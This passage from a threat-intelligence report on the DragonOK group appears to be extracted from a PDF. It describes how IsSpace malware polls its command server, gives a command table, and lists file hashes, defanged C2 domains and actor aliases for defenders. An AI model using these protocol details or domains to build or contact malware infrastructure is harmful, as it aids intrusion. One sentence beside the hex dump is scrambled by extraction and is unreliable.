expected to return one of the following two responses to this HTTP request:\r\nActive\r\nSlient (Note the typo)\r\nIn the event the response of Slient is received, the malware will stop sending out HTTP requests to the\r\n‘Sentire.asp’ URI. Conversely, if the malware is set to the ‘Sleep’ status and the ‘Active’ response is received, it\r\nwill begin the ‘Sentire.asp’ requests once more.\r\nThe requests to ‘Sentire.asp’ act as the main C2 loop, requesting commands from the remote server. The\r\ncommands are consistent with previously observed instances of IsSpace, however, the URIs have been modified.\r\nCommand Description Response URI\r\nCMD Executes command Sentrl.asp\r\nBrowse List specified directory Senjb.asp\r\nUploadFile Upload file Sensp.asp\r\nDownLoad Download file Senwhr.asp\r\nDelFile Delete file N/A\r\nDragonOK Indicators\r\nMalicious RTF Documents\r\n020f5692b9989080b328833260e31df7aa4d58c138384262b9d7fb6d221e3673\r\n0d389a7b7dbdfdffcc9b503d0eaf3699f94d7a3135e46c65a4fa0f79ea263b40\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 25 of 28\n\n52985c6369571793bc547fc9443a96166e372d0960267df298221cd841b69545\r\n785398fedd12935e0ae5ac9c1d188f4868b2dc19fb4c2a13dab0887b8b3e220d\r\n941bcf18f7e841ea35778c971fc968317bee09f93ed314ce40815356a303a3ec\r\nba6f3581c5bcdbe7f23de2d8034aaf2f6dc0e67ff2cfe6e53cfb4d2007547b30\r\ndf9f33892e476458c74a571a9541aebe8f8d18b16278f594a6723f813a147552\r\n925880cc833228999ea06bd37dd2073784ab234ea00c5c4d55f130fe43a0940b\r\n3e4937d06ac86078f96f07117861c734a5fdb5ea307fe7e19ef6458f91c14264\r\n16204cec5731f64be03ea766b75b8997aad14d4eb61b7248aa35fa6b1873398b\r\n64f22de7a1e2726a2c649de133fad2c6ad089236db1006ce3d247c39ee40f578\r\nc3b5503a0a89fd2eae9a77ff92eef69f08d68b963140b0a31721bb4960545e07\r\nd227cf53b29bf0a286e9c4a1e84a7d70b63a3c0ea81a6483fdfabd8fbccd5206\r\n9190b1d3383c68bd0153c926e0ff3716b714eac81f6d125254054b277e3451fe\r\nd321c8005be96a13affeb997b881eaba3e70167a7f0aa5d68eeb4d84520cca02\r\nd38de4250761cb877dfec40344c1642542ca41331af50fa914a9597f8cc0ee9b\r\n5a94e5736ead7ea46dbc95f11a3ca10ae86c8ae381d813975d71feddf14fc07a\r\nbbdc9f02e7844817def006b9bdef1698412efb6e66346454307681134046e595\r\nIsSpace\r\n12d88fbd4960b7caf8d1a4b96868138e67db40d8642a4c21c0279066aae2f429\r\n1a6e3cd2394814a72cdf8db55bc3f781f7e1335b31f77bffc1336f0d11cf23d1\r\nC2 Domains\r\nwww.dppline[.]org\r\nwww.matrens[.]top\r\nC2 Domains\r\neurope.wikaba[.]com\r\nrussiaboy.ssl443[.]org\r\ncool.skywave[.]top\r\nSysget Version 2\r\n82f028e147471e6f8c8d283dbfaba3f5629eda458d818e1a4ddb8c9337fc0118\r\nC2 Domains\r\nnewtw2016.kr44.78host[.]com\r\nSysget Version 3\r\n02fc713c1b2c607dff4fc6c4797b39e42ee576578f6af97295495b9b172158b9\r\na0b0a49da119d971fa3cf2f5647ccc9fe7e1ff989ac31dfb4543f0cb269ed105\r\nb49cb2c51bc2cc5e48585b9b0f7dd7ff2599a086a4219708b102890ab3f4daf3\r\nb8f9c1766ccd4557383b6643b060c15545e5f657d87d82310ed1989679dcfac4\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 26 of 28\n\nd75433833a3a4453fe35aaf57d8699d90d9c4a933a8457f8cc37c86859f62d1e\r\n685076708ace9fda65845e4cbb673fdd6f11488bf0f6fd5216a18d9eaaea1bbc\r\n7fcc86ebca81deab264418f7ae5017a6f79967ccebe8bc866efa14920e4fd909\r\nc5c3e8caffd1d416c1fd8947e60662d82638a3508dbcf95a6c9a2571263bdcef\r\nC2 Domains\r\ngtoimage[.]com\r\ntrend.gogolekr[.]com\r\nAdditional Indicators\r\nSysget Version 2\r\na768d63f8127a8f87ff7fa8a7e4ca1f7e7a88649fe268cf1bd306be9d8069564\r\n2bf737f147e761586df1c421584dba350fd865cb14113eee084f9d673a61ee67\r\n2c7c9fd09a0a783badfb42a491ccec159207ee7f65444088ba8e7c8e617ab5a5\r\nd91439c8faa0c42162ea9a6d3c282d0e76641a31f5f2fbc58315df9c0b90059c\r\n89d8d52c09dc09aeb41b1e9fafeacf1c038912d8c6b75ad4ef556707b15641ff\r\n6c1d56cb16f6342e01f4ebfc063db2244aef16d0a248332348dcdb31244d32f2\r\n9c66232061fbb08088a3b680b4d0bffbbce1ce01d0ce5f0c4d8bf17f42d45682\r\nb138ea2e9b78568ebd9d71c1eb0e31f9cf8bc41cd5919f6522ef498ffcc8762a\r\n8830400c6a6d956309ac9bcbcceee2d27ba8c89f9d89f4484aba7d5680791459\r\nbda66f13202cef8cfb23f36ac0aee5c23f82930e1f38e81ba807f5c4e46128e3\r\ne8197e711018afd25a32dc364a9155c7e2a0c98b3924dc5f67b8cd2df16406ff\r\ne9c0838e2433a86bc2dec56378bd59627d6332ffb1aec252f5117938d00d9f74\r\nc63685b2497e384885e4b4649428d665692e8e6981dad688e8543110174f853b\r\n2c9c2bfea64dd95495703fcec59ad4cf74c43056b40ed96d40db9b919cfd050b\r\n94850525ea9467ae772c657c3b8c72663eaa28b2c995b22a12b09e4cacecad6d\r\ne8bd20e3d8491497ca2d6878b41fb7be67abb97ee272ef8b6735faa6acd67777\r\nC2 Domains\r\nhello.newtaiwan[.]top\r\nbullskingdom[.]com\r\nmail.googleusa[.]top\r\nwww.modelinfos[.]com\r\nmodelinfos[.]com\r\nwww.sanspozone[.]com\r\nSysget Version 3\r\nf9a1607cdcfd83555d2b3f4f539d3dc301d307e462a999484d7adb1f1eb9edf6\r\n7f286fbc39746aa8feeefc88006bedd83a3176d2235e381354c3ea24fe33d21c\r\n3b554ef43d9f3e70ead605ed38b5e66c0b8c0b9fc8df16997defa8e52824a2a6\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 27 of 28\n\n8d7406f4d5759574416b8e443dd9d9cd6e24b5e39b1f5bc679e4a1ad54d409c6\r\nedf32cb7aad7ae6f545f7d9f11e14a8899ab0ac51b224ed36cfc0d367daf5785\r\ndb19b9062063302d938bae51fe332f49134dc2e1947d980c82e778e9d7ca0616\r\ncde217acb6cfe20948b37b16769164c5f384452e802759eaabcfa1946ea9e18b\r\n9bee4f8674ee067159675f66ca8d940282b55fd1f71b8bc2aa32795fd55cd17e\r\n39539eb972de4e5fe525b3226f679c94476dfc88b2032c70e5d7b66058619075\r\nc45145ca9af7f21fff95c52726ff82595c9845b8e9d0dbf93ffe98b7a6fa8ee9\r\n55325e9fccbdada83279e915e5aeb60d7b117f154fa2c3a38ec686d2552b1ebc\r\n2c7d29da1b5468b49a4aef31eee6757dc5c3627bf2fbfb8e01dec12aed34736a\r\n16dc75cf16d582eac6cbbe67b048a31fffa2fb525a76c5794dad7d751793c410\r\n91eee738f99174461b9a4085ea70ddafc0997790e7e5d6d07704dcbbc72dc8bf\r\n4a702ffbf01913cc3981d9802c075160dfd1beed3ba0681153d17623f781f53f\r\ne8bed52c58759e715d2a00bdb8a69e7e93def8d4f83d95986da21a549f4d51c5\r\ned5598716de2129915f427065f0a22f425f4087584e1fa176c6de6ad141889d1\r\nadc86af1c03081482fe9ba9d8a8ae875d7217433164d54e40603e422451a2b90\r\nf0540148768247ed001f3894cdfa52d8e40b17d38df0f97e040a49baa3f5c92e\r\nce38a6e4f15b9986474c5d7c8a6e8b0826330f0135e1da087aae9eab60ea667a\r\n5c4e98922e6981cf2a801674d7e79a573ebcdc9ebc875ef929511f585b9c4781\r\n4880b43ddc8466d910b7b49b6779970c38ce095983cad110fa924b41f249f898\r\n76b6f0359a3380943fece13033b79dc586706b8348a270ac71b589a5fd5790a4\r\nfeab16570c11ec713cfa952457502c7edd21643129c846609cb13cdc0ae4671c\r\ned9ca7c06aac7525da5af3d1806b32eeb1c1d8f14cc31382ca52a14ed62f00a9\r\na3aa4b3b3471b0bb5b2f61cbc8a94edef4988436e0bc55e9503173c836fb57a3\r\n29ee56ca66187ece41c1525ad27969a4b850a45815057a31acee7cc76e970909\r\n65201380443210518621da9feb45756eac31213a21a81583cc158f8f65d50626\r\ncccb906d06aef1e33d12b8b09c233e575482228d40ac17232acad2557da4e53b\r\nC2 Domains\r\ngtoimage[.]com\r\ntrend.gogolekr[.com\r\nwww.bestfiles[.]top\r\nSysget Version 4\r\n2ac8bc678e5fa3e87d34aee06d2cd56ab8e0ed04cd236cc9d4c5e0fa6d303fa3\r\n8dc539e3d37ccd522c594dc7378c32e5b9deeffb37e7a7a5e9a96b9a23df398e\r\nC2 Domains\r\nwww.sanseitime[.]com\r\nSource: https://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 28 of 28\n\nThe contents unique key. The of this POST request first 50 bytes contains the are reserved for victim’s identifier, the victim identifier, as as well as the file’s shown below: contents encrypted with the\n0000016F 35 37 31 37 63 62 38 66 65 64 32 37 35 30 61 32 5717cb8f ed2750a2\n0000017F 65 65 39 65 38 33 30 61 33 30 37 31 36 65 64 34 ee9e830a 30716ed4\n0000018F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n Page 17 of 28", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA" ], "references": [ "https://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" ], "report_names": [ "unit42-dragonok-updates-toolset-targets-multiple-geographic-regions" ], "threat_actors": [ { "id": "5ffe400c-6025-44c2-9aa1-7c34a7a192b0", "created_at": "2023-01-06T13:46:38.469688Z", "updated_at": "2026-04-10T02:00:02.987949Z", "deleted_at": null, "main_name": "DragonOK", "aliases": [ "Moafee", "BRONZE OVERBROOK", "G0017", "G0002", "Shallow Taurus" ], "source_name": "MISPGALAXY:DragonOK", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7ebda3c6-1789-4d84-97cf-47fb18a0cb28", "created_at": "2022-10-25T15:50:23.78829Z", "updated_at": "2026-04-10T02:00:05.415039Z", "deleted_at": null, "main_name": "DragonOK", "aliases": [ "DragonOK" ], "source_name": "MITRE:DragonOK", "tools": [ "PoisonIvy", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "593dd07d-853c-46cd-8117-e24061034bbf", "created_at": "2025-08-07T02:03:24.648074Z", "updated_at": "2026-04-10T02:00:03.625859Z", "deleted_at": null, "main_name": "BRONZE OVERBROOK", "aliases": [ "Danti ", "DragonOK ", "Samurai Panda ", "Shallow Taurus ", "Temp.DragonOK " ], "source_name": "Secureworks:BRONZE OVERBROOK", "tools": [ "Aveo", "DDKONG", "Godzilla Webshell", "HelloBridge", "IsSpace", "NFLog Trojan", "PLAINTEE", "PlugX", "Rambo" ], "source_id": "Secureworks", "reports": null }, { "id": "340d1673-0678-4e1f-8b75-30da2f65cc80", "created_at": "2022-10-25T16:07:23.552036Z", "updated_at": "2026-04-10T02:00:04.653109Z", "deleted_at": null, "main_name": "DragonOK", "aliases": [ "Bronze Overbrook", "G0017", "Shallow Taurus" ], "source_name": "ETDA:DragonOK", "tools": [ "Agent.dhwf", "CT", "Chymine", "Darkmoon", "Destroy RAT", "DestroyRAT", "FF-RAT", "FormerFirstRAT", "Gen:Trojan.Heur.PT", "HTran", "HUC Packet Transmit Tool", "HelloBridge", "IsSpace", "KHRAT", "Kaba", "Korplug", "Mongall", "NFlog", "NewCT", "NfLog RAT", "PlugX", "Poison Ivy", "Rambo", "RedDelta", "SPIVY", "Sogu", "SysGet", "TIGERPLUG", "TVT", "Thoper", "TidePool", "Xamtrav", "brebsd", "ffrat", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434340, "ts_updated_at": 1775792057, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f4c1371ead52fc9c24313563bf94349006cb165d.pdf", "text": "https://archive.orkl.eu/f4c1371ead52fc9c24313563bf94349006cb165d.txt", "img": "https://archive.orkl.eu/f4c1371ead52fc9c24313563bf94349006cb165d.jpg" } }